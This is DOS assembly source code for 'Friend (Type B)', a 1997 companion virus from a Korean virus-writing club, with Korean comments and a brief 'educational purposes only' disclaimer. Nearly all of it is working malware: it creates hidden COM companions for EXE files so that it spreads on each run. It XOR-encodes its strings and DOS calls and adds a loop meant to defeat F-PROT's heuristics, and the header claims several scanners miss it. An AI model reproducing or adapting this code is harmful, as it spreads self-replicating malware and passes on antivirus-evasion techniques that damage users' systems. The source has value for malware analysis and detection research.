;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
;                                              \\\\\\\  \       \  \
;                                             \          \     \   \
;     Friend (Type B)                         \           \   \    \   98/03
;                      by Osiris / CVC        \            \ \     \
;                                              \\\\\\\      \      \\\\\\\ #01
;
; Virus Name : Friend (Type B)
; AV Name    : Frien
; Author     : Osiris of CVC
; Origin     : Corea
; Date       : 1997/09/05
;
; Type : Non memory resident Companion
;
; !****************************************************************************!
; *                                                                            *
; * 경고 !                                                                     *
; *    이것은 바이러스 소스 코드이다. 교육적인 목적으로만 사용되어야한다.      *
; *    제작자는 이 소스코드로 야기되는 어떠한 문제에 대해서도 책임을 지지 않   *
; *    는다. 변형 하거나 실행하지 마라 !                                       *
; *                                                                            *
; * Warning !                                                                  *
; *    This is a VIRUS source code. This source code is provieded educational  *
; *    purpose. The author is not responsible for any damage caused by this c  *
; *    ode. Don't modify & execute it !                                        *
; *                                                                            *
; !****************************************************************************!
;
; 비상주 Companion 바이러스이다.
; CVL #03 에서 공개된 버전은 두번째 버전이다.
;
; 현재 디렉토리에서 1 개의 EXE 파일을 찾아 동일 파일명 COM 파일을 생성해둔다.
;
; 치료는 생성된 COM 파일만 삭제하면 된다.
;
; * Friend (Type A) : 최초 버전
; ! Friend (Type B) : Anti-herustic 기법 사용
;
;
; AV 테스트 : 1998 년 1월 현재 DSAV,F-PROT,TBAV 에서 진단되지 않는다.
; Heuristic Test : AVP 에서 진단되며 F-PROT 에서 간혹 진단된다.
;                  DrWeb 에서 진단된다.
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

            .MODEL  TINY
            .CODE

 PARASIZE   EQU  (End_Memory-Friend+0Fh) SHR 4 + 13h

            org   100h

 Friend:
            call  Anti_Herustic             ; F-prot 의 진단을 방해한다.
            jmp   Virus_Start               ; 바이러스 시작

 Msg        db    0Dh,0Ah
            db    '[Friend] Type B. 1997/09'
            db    '(c) Copyleft Osiris of CVC (Corean Virus Club),Corea$'

 Ext        db    'C' XOR 12h, 'O' XOR 12h, 'M' XOR 12h ; 암호화 되어 있다.
            db    '*' XOR 12h, '.' XOR 12h, 'E' XOR 12h
            db    'X' XOR 12h, 'E' XOR 12h,  00 XOR 12h

 Virus_Start:
            mov   si, offset Ext            ; 암호화된 확장자 복사
            mov   di, offset Ext_COM        ; 복사 될 곳
            mov   cx, 0009                  ; 길이
 CopyExt:
            lodsb
            xor   al,12h                    ; 복사 되면서 암호화된 내용을 푼다.
            stosb
            loop  CopyExt

            mov   ah, (2fh xor 12h)         ; DTA 구하기
            call  call_Int21
            push  es                        ; DTA 값 저장
            push  bx

            mov   ah, (1ah xor 12h)         ; 새로운 DTA 설정
            mov   dx, offset NewDTA
            call  call_Int21

            mov   ah,(4Eh xor 12h)          ; EXE 파일 찾기
            mov   cx,00100011B              ; 읽기전용/숨김파일
            mov   dx, offset Mask_EXE       ;
 Find_repeat:
            call  call_Int21                ;
            jc    Execute_EXE               ; 감염 시킬 파일이 없으면 EXE 실행

 Infect_EXE:
            mov   si, offset NewDTA + 1Eh   ; SI = 파일 이름
            call  ChgExt                    ; EXE -> COM, COM -> EXE

            mov   ax, (4300h xor 1234h)     ; 감염 여부 확인
            mov   dx, offset NewDTA + 1Eh   ; -> COM 파일이 존재 하는가 ?
            call  call_Int21                ; 속성을 찾을 수 있다면 감염되어 있
            jc    Drop_COM                  ; 다.

            mov   ah, (4Fh xor 12h)         ; 다음 파일 찾기
            jmp   Find_repeat

 Drop_COM:
            mov   ah, (3ch xor 12h)         ; COM 파일 생성
            mov   cx, 00000011B             ; 읽기만 / 숨김
            mov   dx, offset NewDTA + 1Eh   ;
            call  call_Int21

            xchg  ax,bx                     ; 핸들 얻기

            mov   ah, (40h xor 12h)         ; 바이러스 쓰기
            mov   cx, offset End_virus - 100h ; 바이러스 길이
            mov   dx, 100h                  ; 버퍼
            call  call_Int21

            mov   ah, (3eh xor 12h)         ; 파일 닫기
            call  call_Int21

 Execute_EXE:
            pop   dx                        ; 원래 DTA 복구
            pop   ds
            mov   ah,1ah
            int   21h

            mov   sp, offset End_Memory     ; 스택 조정

            mov   ah,4ah                    ; 메모리 조정
            mov   bx, PARASIZE
            int   21h

            call  Set_env                   ; 원래 EXE 파일 실행을 위한 환경
                                            ; 영역 설정

            mov   si, offset Filename
            call  ChgExt                    ; 확장자 변경

            mov   ax, 4b00h                 ; 원래 EXE 파일 실행
            mov   bx, offset Env_Block
            mov   dx, offset Filename
            int   21h

            mov   ah, 4dh                   ; 리턴값 얻기
            int   21h
 Stop_virus:
            mov   ax, 4c00h                 ; 바이러스 끝내기
            int   21h

;******************************************************************************
; 확장자 바꾸기 (EXE -> COM, COM -> EXE)
; 입력 SI = 바꾸고자 하는 확장자
;******************************************************************************

 ChgExt     proc  near                      ; 확장자 바꾸기

 Loop_Eof:
            lodsb
            or    al,al
            jnz   Loop_Eof

            mov   di,si
            sub   di,4                      ; DI = 확장자 위치
            mov   si, offset Ext_COM        ; SI = COM

            cmp   byte ptr [di],'E'         ; EXE 파일 인가 ?
            jz    mov_ext
            add   si,0005                   ; SI = EXE
 mov_ext:
            mov   cx,0003
            repz  movsb                     ; 확장자가 COM 이면 EXE 로
                                            ; EXE 이면 COM 으로 바꾼다.
            ret
 ChgExt     Endp


;******************************************************************************
; 환영영역에서 재실행에 필요한 정보 얻기
;******************************************************************************
 Set_Env    proc  near

            mov   PSP1,es
            mov   PSP2,es
            mov   PSP3,es

 Search_RD:                                 ; 다시 실행하기 위해서 필요한 값들을 알아낸다.
            xor   si,si
            mov   ds,ds:[002Ch]             ; 실행시킨 파일의 이름을 알아낸다.

 Search_RD_LOOP:
            cmp   word ptr DS:[SI],0000     ; 파일이름전에는 0000이다.
            jz    Get_FileName              ; PSP:[002Ch] --> 세그먼트
            inc   si
            jmp   Search_RD_LOOP

 Get_FileName:
            add   si,0004
            mov   dx,si                     ; 현재 실행되는 파일이름

            mov   di, offset Filename
            mov   cx,0080
            repz  movsb

            push  cs                        ;
            pop   ds
            RET

 Set_env    endp

;******************************************************************************
;           F-PROT 의 인공지능 검사를 무력화 시킨다.
;******************************************************************************
 Anti_Herustic    Proc
                                            ; F-prot 에게 이 프로그램은 루프를
            mov   si,9452                   ; 도는것 처럼 속여서 다음으로 제어
 AH_Loop:                                   ; 권이 넘어 가지 않게 해서 진단을
            nop                             ; 방해한다.
            nop                             ;
            dec   si
            cld                             ;
            jnz   AH_Loop                   ;
            ret


 Anti_Herustic    Endp

;
; 인터럽트 21h 호출
;

 Call_Int21       proc

            xor   ax,1234h                  ;
            int   21h
            ret

 Call_Int21       endp

;
; 재실행을 위한 블럭
;

 ENV_BLOCK  dw    ?                         ; 재실행용 블럭
            dw    80h                       ;
 PSP1       dw    ?
            dw    5ch                       ;
 PSP2       dw    ?
            dw    6ch                       ;
 PSP3       dw    ?

 End_Virus:

 Ext_COM    db    3 dup (0)                 ; 확장자 COM
 Mask_EXE   db    5 dup (0)                 ; *.EXE 저장

 Filename   db    85  dup (0)               ; 파일 이름
 NewDTA     db    50  dup (0)               ; DTA
            db    100 dup (0)               ; 스택

 End_Memory:

            END   Friend

